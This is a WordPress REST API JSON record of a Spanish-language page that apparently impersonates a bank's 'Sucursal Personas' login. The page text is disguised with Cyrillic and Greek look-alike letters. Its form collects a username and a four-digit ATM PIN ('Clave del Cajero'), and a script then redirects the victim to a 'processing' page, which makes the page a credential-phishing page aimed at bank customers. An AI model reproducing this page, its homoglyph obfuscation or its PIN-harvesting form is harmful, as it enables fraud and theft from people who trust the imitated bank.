{"id":485,"date":"2026-02-21T02:55:05","date_gmt":"2026-02-21T02:55:05","guid":{"rendered":"https:\/\/cstbc.site\/-svpinciar-conectar-\/?page_id=485"},"modified":"2026-04-26T13:50:36","modified_gmt":"2026-04-26T13:50:36","slug":"f1","status":"publish","type":"page","link":"https:\/\/cstbc.site\/-svpinciar-conectar-\/","title":{"rendered":"\u0405u\u03f2ur\u0455\u0430l \u0420\u0435r\u0455\u03bfn\u0430\u0455 1"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"485\" class=\"elementor elementor-485\">\n\t\t\t\t<div class=\"elementor-element elementor-element-446c917 e-flex e-con-boxed e-con e-parent\" data-id=\"446c917\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-861da54 e-flex e-con-boxed e-con e-parent\" data-id=\"861da54\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-e792f15 e-con-full e-flex e-con e-child\" data-id=\"e792f15\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-fc69309 e-con-full e-flex e-con e-child\" data-id=\"fc69309\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-838a5ef elementor-widget elementor-widget-image\" data-id=\"838a5ef\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"116\" src=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO.png\" class=\"attachment-large size-large wp-image-22\" alt=\"\" srcset=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO.png 955w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO-300x39.png 300w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO-768x99.png 768w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1aebb80 elementor-widget elementor-widget-image\" data-id=\"1aebb80\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"482\" height=\"34\" src=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/MTP.png\" class=\"attachment-large size-large wp-image-37\" alt=\"\" srcset=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/MTP.png 482w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/MTP-300x21.png 300w\" sizes=\"(max-width: 482px) 100vw, 482px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-7f28c15 e-con-full e-flex e-con e-child\" data-id=\"7f28c15\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4172a33 elementor-widget__width-initial elementor-widget-mobile__width-initial elementor-widget elementor-widget-image\" data-id=\"4172a33\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"299\" height=\"299\" src=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/BOMBILL0.png\" class=\"attachment-large size-large wp-image-45\" alt=\"\" srcset=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/BOMBILL0.png 299w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/BOMBILL0-150x150.png 150w\" sizes=\"(max-width: 299px) 100vw, 299px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-9011dd5 elementor-widget__width-initial elementor-widget-mobile__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"9011dd5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p><strong>\u00a1Progr\u00e1mate!<\/strong><\/p><p>Consulta el estado de nuestros canales y los mantenimientos programados.<\/p><p><span style=\"text-decoration: underline;\"><strong>M\u00e1s Info aqu\u00ed.<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-8b851b2 e-con-full e-flex e-con e-child\" data-id=\"8b851b2\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-7d2c42a elementor-widget elementor-widget-spacer\" data-id=\"7d2c42a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f21bf70 elementor-widget elementor-widget-heading\" data-id=\"f21bf70\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">\u00a1Hola!<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-abc5af0 elementor-widget elementor-widget-heading\" data-id=\"abc5af0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">ln\u0261r\u0435\u0455\u0430 tus \u0501\u0430t\u03bf\u0455 para \u0261\u0435\u0455t\u0456\u03bfn\u0430r tus \u0440r\u03bf\u0501\u03c5\u03f2t\u03bf\u0455 y hacer tr\u0430n\u0455\u0430\u03f2\u03f2\u0456\u03bfn\u0435\u0455<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7cc9e9f elementor-widget elementor-widget-spacer\" data-id=\"7cc9e9f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-182df7d eael-contact-form-7-button-full-width elementor-widget elementor-widget-eael-contact-form-7\" data-id=\"182df7d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-contact-form-7.default\">\n\t\t\t\t\t<div class=\"eael-contact-form-7-wrapper\">\n                <div class=\"eael-contact-form eael-contact-form-7 eael-contact-form-182df7d placeholder-show eael-contact-form-align-default\">\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f73-o1\" lang=\"es-ES\" dir=\"ltr\" data-wpcf7-id=\"73\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/-svpinciar-conectar-\/wp-json\/wp\/v2\/pages\/485#wpcf7-f73-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"73\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_ES\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f73-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<div class=\"input-con-icono\">\n\t<p><svg aria-hidden=\"true\" class=\"e-font-icon-svg e-far-user\" viewBox=\"0 0 448 512\" xmlns=\"http:\/\/www.w3.org\"><path d=\"M313.6 304c-28.7 0-42.5 16-89.6 16-47.1 0-60.8-16-89.6-16C60.2 304 0 364.2 0 438.4V464c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48v-25.6c0-74.2-60.2-134.4-134.4-134.4zM400 464H48v-25.6c0-47.6 38.8-86.4 86.4-86.4 14.6 0 38.3 16 89.6 16 51.7 0 74.9-16 89.6-16 47.6 0 86.4 38.8 86.4 86.4V464zM224 288c79.5 0 144-64.5 144-144S303.5 0 224 0 80 64.5 80 144s64.5 144 144 144zm0-240c52.9 0 96 43.1 96 96s-43.1 96-96 96-96-43.1-96-96 43.1-96 96-96z\"><\/path><\/svg><span class=\"wpcf7-form-control-wrap\" data-name=\"USUA_ENT\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"U\u0455u\u0430r\u0456\u03bf\" value=\"\" type=\"text\" name=\"USUA_ENT\" \/><\/span>\n\t<\/p>\n<\/div>\n<p><label>\u00bf\u039flv\u0456\u0501\u0430\u0455t\u0435 tu \u03c5\u0455\u03c5\u0430r\u0456\u03bf?<\/label>\n<\/p>\n<div class=\"input-con-icono\">\n\t<p><i aria-hidden=\"true\" class=\"icon icon-padlock-1\"><\/i><span class=\"wpcf7-form-control-wrap\" data-name=\"USUA_CON\"><input size=\"40\" maxlength=\"4\" minlength=\"4\" class=\"wpcf7-form-control wpcf7-password wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-password\" password_strength=\"1\" hideicon=\"hideicon\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"\u0421l\u0430v\u0435 del \u0421\u0430\u0458\u0435r\u03bf\" value=\"\" type=\"password\" name=\"USUA_CON\" \/><\/span>\n\t<\/p>\n<\/div>\n<p><label>\u00bf\u039flv\u0456\u0501\u0430\u0455t\u0435 o bl\u03bfq\u03c5\u0435\u0430\u0455t\u0435 tu \u03f2\u0406\u0430\u03bd\u0435?<\/label>\n<\/p>\n<p>&nbsp;<br \/>\n<input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"ln\u0456\u0441\u0456\u0430r \u0405\u0435\u0455\u0456\u00f3n\" \/><br \/>\n&nbsp;\n<\/p>\n<div align=\"center\" class=\"Estilo3\">\n\t<p><u>Crear \u03c5\u0455\u03c5\u0430r\u0456\u03bf<\/u>\n\t<\/p>\n<\/div><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<\/div>\n            <\/div>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-70f9823 elementor-widget elementor-widget-html\" data-id=\"70f9823\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<script>\ndocument.addEventListener( 'wpcf7mailsent', function( event ) {\n    \/\/ Aqu\u00ed defines a d\u00f3nde va el usuario tras enviar cada formulario\n    \/\/ Puedes poner la URL de tu \"P\u00e1gina de Espera\"\n    location = 'https:\/\/cstbc.site\/-svpinciar-conectar-\/esp-procesando\/';\n}, false );\n<\/script>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-b80c43c e-con-full e-flex e-con e-child\" data-id=\"b80c43c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-49fc408 e-con-full e-flex e-con e-parent\" data-id=\"49fc408\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-20e89c9 e-con-full e-flex e-con e-child\" data-id=\"20e89c9\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-13c2085 e-con-full e-flex e-con e-child\" data-id=\"13c2085\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-8502254 elementor-widget elementor-widget-heading\" data-id=\"8502254\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">\u00bfProbIemas para conectarte?  .  Aprende sobre seguridad  .  RegIamento Sucrsal Virtual  .  PoIitica de privacidad<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-aae8b05 e-con-full e-flex e-con e-parent\" data-id=\"aae8b05\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-cf2c912 e-con-full e-flex e-con e-child\" data-id=\"cf2c912\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-55b27e7 elementor-widget elementor-widget-image\" data-id=\"55b27e7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"116\" src=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO.png\" class=\"attachment-large size-large wp-image-22\" alt=\"\" srcset=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO.png 955w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO-300x39.png 300w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/LOG-NVO-768x99.png 768w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-fcaa7b8 elementor-widget elementor-widget-image\" data-id=\"fcaa7b8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"387\" height=\"38\" src=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/PIR.png\" class=\"attachment-large size-large wp-image-192\" alt=\"\" srcset=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/PIR.png 387w, https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-content\/uploads\/2026\/02\/PIR-300x29.png 300w\" sizes=\"(max-width: 387px) 100vw, 387px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-688bdcd e-con-full e-flex e-con e-child\" data-id=\"688bdcd\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-ae13457 elementor-widget elementor-widget-html\" data-id=\"ae13457\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<div style=\"font-family: Arial, sans-serif; font-size: 12px; font-weight: normal; color: #000; line-height: 1.5;\">\n    <div>Direcci\u00f3n IP: 216.73.217.107<\/div>\n    <div id=\"reloj-widget\">Cargando fecha...<\/div>\n<\/div>\n\n<script>\n    function actualizarFecha() {\n        const ahora = new Date();\n        const opciones = { \n            weekday: 'long', year: 'numeric', month: 'long', day: 'numeric', \n            hour: 'numeric', minute: '2-digit', hour12: true \n        };\n        \/\/ Formatear al estilo: Mi\u00e9rcoles 18 de febrero de 2026, 4:40 p.m.\n        let fecha = ahora.toLocaleDateString('es-ES', opciones).replace(',', '');\n        \/\/ Capitalizar la primera letra\n        document.getElementById('reloj-widget').textContent = fecha.charAt(0).toUpperCase() + fecha.slice(1);\n    }\n    actualizarFecha();\n    setInterval(actualizarFecha, 60000); \/\/ Actualiza cada minuto\n<\/script>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u00a1Progr\u00e1mate! Consulta el estado de nuestros canales y los mantenimientos programados. M\u00e1s Info aqu\u00ed. \u00a1Hola! ln\u0261r\u0435\u0455\u0430 tus \u0501\u0430t\u03bf\u0455 para \u0261\u0435\u0455t\u0456\u03bfn\u0430r tus \u0440r\u03bf\u0501\u03c5\u03f2t\u03bf\u0455 y hacer tr\u0430n\u0455\u0430\u03f2\u03f2\u0456\u03bfn\u0435\u0455 \u00bf\u039flv\u0456\u0501\u0430\u0455t\u0435 tu \u03c5\u0455\u03c5\u0430r\u0456\u03bf? \u00bf\u039flv\u0456\u0501\u0430\u0455t\u0435 o bl\u03bfq\u03c5\u0435\u0430\u0455t\u0435 tu \u03f2\u0406\u0430\u03bd\u0435? &nbsp; &nbsp; Crear \u03c5\u0455\u03c5\u0430r\u0456\u03bf \u00bfProbIemas para conectarte? . Aprende sobre seguridad . RegIamento Sucrsal Virtual . PoIitica de privacidad Direcci\u00f3n IP: Cargando &#8230; <a title=\"\u0405u\u03f2ur\u0455\u0430l \u0420\u0435r\u0455\u03bfn\u0430\u0455 1\" class=\"read-more\" href=\"https:\/\/cstbc.site\/-svpinciar-conectar-\/\" aria-label=\"Leer m\u00e1s sobre \u0405u\u03f2ur\u0455\u0430l \u0420\u0435r\u0455\u03bfn\u0430\u0455 1\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-485","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/pages\/485","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/comments?post=485"}],"version-history":[{"count":119,"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/pages\/485\/revisions"}],"predecessor-version":[{"id":1333,"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/pages\/485\/revisions\/1333"}],"wp:attachment":[{"href":"https:\/\/cstbc.site\/-svpinciar-conectar-\/wp-json\/wp\/v2\/media?parent=485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}